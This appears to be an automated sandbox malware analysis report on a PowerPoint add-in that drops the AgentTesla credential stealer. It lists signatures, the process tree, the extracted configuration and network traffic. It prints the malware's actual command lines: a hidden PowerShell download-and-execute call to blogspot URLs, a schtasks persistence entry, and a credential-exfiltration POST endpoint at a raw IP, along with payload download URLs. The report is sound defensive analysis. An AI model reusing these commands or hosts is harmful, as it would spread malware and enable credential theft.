
Windows Analysis Report 3.ppam

Overview

General Information

Sample Name: 3.ppam
Analysis ID: 553159
MD5: df075573f3546a582d5f4c690a469d9d
SHA1: 60c1884b11d4eb05f687e077adadcd749b7a488d
SHA256: 4337ff8e652f6fe6b0a8d0a01a67c23764a3bf31eb9ae5fca8826f246d1de2ed
Tags: ppam

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Sigma detected: Schedule system process
Antivirus detection for URL or domain
Creates an autostart registry key pointing to binary in C:\Windows
Document contains an embedded VBA macro which may execute processes
Writes to foreign memory regions
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses known network protocols on non-standard ports
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Injects a PE file into a foreign processes
Creates autostart registry keys with suspicious values (likely registry only malware)
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious aspnet_compiler.exe Execution
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Document contains embedded VBA macros
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Connects to a URL shortener service
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • POWERPNT.EXE (PID: 5140 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" /AUTOMATION -Embedding MD5: 68F52CD14C61DDC941769B55AE3F2EE9)
  • cmd.exe (PID: 4964 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\3.ppam" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • POWERPNT.EXE (PID: 5720 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou " MD5: 68F52CD14C61DDC941769B55AE3F2EE9)
      • powershell.exe (PID: 6628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6028 cmdline: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex; MD5: 15FF7D8324231381BAD48A052F85DF04)
        • aspnet_compiler.exe (PID: 1200 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe MD5: AE2C1DCC77B6ED0711330B075028D7B3)
        • aspnet_compiler.exe (PID: 6068 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe MD5: AE2C1DCC77B6ED0711330B075028D7B3)
        • aspnet_compiler.exe (PID: 5156 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe MD5: AE2C1DCC77B6ED0711330B075028D7B3)
  • powershell.exe (PID: 3660 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p26ynn.blogspot.com/atom.xml" -useB|iex; MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 6240 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex; MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 3860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6656 cmdline: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex; MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • powershell.exe (PID: 1284 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex; MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6288 cmdline: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex; MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://207.32.217.137:8081/n/p6df/asshole/08e40c81aa01a5cf.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: aspnet_compiler.exe PID: 6068 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: aspnet_compiler.exe PID: 6068 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Change PowerShell Policies to a Unsecure Level
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou ", ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, ParentProcessId: 5720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ProcessId: 6628
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou ", ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, ParentProcessId: 5720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ProcessId: 6628
Sigma detected: Suspicious aspnet_compiler.exe Execution
Source: Process started; Author: frack113; Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6628, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, ProcessId: 1200
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Source: Process started; Author: James Pemberton / @4A616D6573; Data: Command: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, CommandLine: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6628, ProcessCommandLine: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, ProcessId: 6028
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou ", ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, ParentProcessId: 5720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ProcessId: 6628
Sigma detected: T1086 PowerShell Execution
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132866651880071197.6628.DefaultAppDomain.powershell

Persistence and Installation Behavior:

Sigma detected: Schedule system process
Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, CommandLine: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6628, ProcessCommandLine: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, ProcessId: 6028

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 31.0.aspnet_compiler.exe.400000.4.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://207.32.217.137:8081/n/p6df/asshole/08e40c81aa01a5cf.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}
Multi AV Scanner detection for submitted file
Source: 3.ppam; ReversingLabs: Detection: 25%
Antivirus detection for URL or domain
Source: https://5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com/ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txt; Avira URL Cloud: Label: malware
Source: 31.0.aspnet_compiler.exe.400000.4.unpack; Avira: Label: TR/Dropper.MSIL.Gen2
Source: 31.0.aspnet_compiler.exe.400000.1.unpack; Avira: Label: TR/Dropper.MSIL.Gen2
Source: 31.0.aspnet_compiler.exe.400000.3.unpack; Avira: Label: TR/Dropper.MSIL.Gen2
Source: 31.2.aspnet_compiler.exe.400000.0.unpack; Avira: Label: TR/Dropper.MSIL.Gen2
Source: 31.0.aspnet_compiler.exe.400000.0.unpack; Avira: Label: TR/Dropper.MSIL.Gen2
Source: 31.0.aspnet_compiler.exe.400000.2.unpack; Avira: Label: TR/Dropper.MSIL.Gen2
Source: unknown; HTTPS traffic detected: 104.16.202.237:443 -> 192.168.2.3:49780 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49784 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49825 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49824 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.3:49827 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 34.102.176.152:443 -> 192.168.2.3:49828 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49829 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49834 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 104.16.202.237:443 -> 192.168.2.3:49835 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49836 version: TLS 1.0
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE; File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic; DNS query: name: www.j.mp
Source: global traffic; TCP traffic: 192.168.2.3:49776 -> 67.199.248.17:80
Source: global traffic; TCP traffic: 192.168.2.3:49780 -> 104.16.202.237:443
Source: powerpnt.exe; Memory has grown: Private usage: 0MB later: 49MB

Networking:

Uses known network protocols on non-standard ports
Source: unknown; Network traffic detected: HTTP traffic on port 49838 -> 8081
Source: unknown; Network traffic detected: HTTP traffic on port 8081 -> 49838
Source: unknown; Network traffic detected: HTTP traffic on port 49839 -> 8081
Source: unknown; Network traffic detected: HTTP traffic on port 8081 -> 49839
Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View; IP Address: 104.16.202.237 104.16.202.237
Source: global traffic; HTTP traffic detected: GET /file/nm9ysba5ejf20r8/6.dll/file HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1; Host: www.mediafire.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /rm83e8erdqxg/nm9ysba5ejf20r8/6.dll HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1; Host: download2262.mediafire.com; Cookie: ukey=izna1o17t8hk2hcl41rskil668flg4w4; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /atom.xml HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1; Host: p6tbbb.blogspot.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /atom.xml HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1; Host: p26ynn.blogspot.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /file/5avuvurhf9r42y3/6.dll/file HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1; Host: www.mediafire.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txt HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1; Host: 5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /u45xa78x9nkg/5avuvurhf9r42y3/6.dll HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1; Host: download2262.mediafire.com; Cookie: ukey=8gv80wkxqbda9mv7zrd52a2eanmh8cy0; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /1rxjqgtrygkg/5avuvurhf9r42y3/6.dll HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1; Host: download2262.mediafire.com; Cookie: ukey=s7huv8g43j1r0etull8h9ns6aiwyny7l; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /asasdjiasjdiasjasdasddik HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1; Host: www.j.mp; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /asasdjiasjdiasjasdasddik HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1; Host: bit.ly; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0; Content-Type: application/x-www-form-urlencoded; Host: 207.32.217.137:8081; Content-Length: 282; Expect: 100-continue; Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 284Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global traffic | HTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 | Content-Type: application/x-www-form-urlencoded | Host: 207.32.217.137:8081 | Content-Length: 286 | Expect: 100-continue
          Source: global traffic | TCP traffic: 192.168.2.3:49838 -> 207.32.217.137:8081
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | DNS query: name: bit.ly
          Source: unknown | TCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: aspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: aspnet_compiler.exe, 0000001F.00000002.595461518.0000000003588000.00000004.00000001.sdmp, aspnet_compiler.exe, 0000001F.00000002.595879670.0000000003656000.00000004.00000001.sdmp, aspnet_compiler.exe, 0000001F.00000002.595907029.000000000365C000.00000004.00000001.sdmp, aspnet_compiler.exe, 0000001F.00000002.596041757.0000000003682000.00000004.00000001.sdmp, aspnet_compiler.exe, 0000001F.00000002.595740683.0000000003616000.00000004.00000001.sdmp, aspnet_compiler.exe, 0000001F.00000002.596016049.000000000367C000.00000004.00000001.sdmp | String found in binary or memory: http://207.32.217.137:8081
          Source: aspnet_compiler.exe, 0000001F.00000002.595461518.0000000003588000.00000004.00000001.sdmp | String found in binary or memory: http://207.32.217.137:8081/n/p6df/asshole/08e40c81aa01a5cf.php
          Source: aspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp | String found in binary or memory: http://207.32.217.137:8081/n/p6df/asshole/08e40c81aa01a5cf.php127.0.0.1POST
          Source: aspnet_compiler.exe, 0000001F.00000002.595461518.0000000003588000.00000004.00000001.sdmp | String found in binary or memory: http://207.32.217.137:8081x&bq(
          Source: aspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
          Source: powershell.exe, 00000009.00000003.439483143.0000000002CC6000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: aspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp | String found in binary or memory: http://kVEmyA.com
          Source: ~DF85570804A0D29ED2.TMP.7.dr | String found in binary or memory: http://www.j.mp/asao
          Source: ~DF1369462A1EE99835.TMP.7.dr, notnice.ps1.7.dr, vbaProject.bin | String found in binary or memory: http://www.j.mp/asasdjiasjdiasjasdasddik
          Source: powershell.exe, 00000009.00000003.392280394.0000000005423000.00000004.00000001.sdmp | String found in binary or memory: https://go.micro
          Source: PowerShell_transcript.651689.x22XD8Wy.20220114122042.txt.22.drString found in binary or memory: https://p26ynn.blogspot.com/atom.xml
          Source: PowerShell_transcript.651689.TDo_fU7j.20220114122054.txt.27.drString found in binary or memory: https://p6tbbb.blogspot.com/atom.xml
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://pages.store.office.com/review/query
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://powerlift.acompli.net
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://roaming.edog.
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://settings.outlook.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://shell.suite.office.com:1443
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://skyapi.live.net/Activity/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://staging.cortana.ai
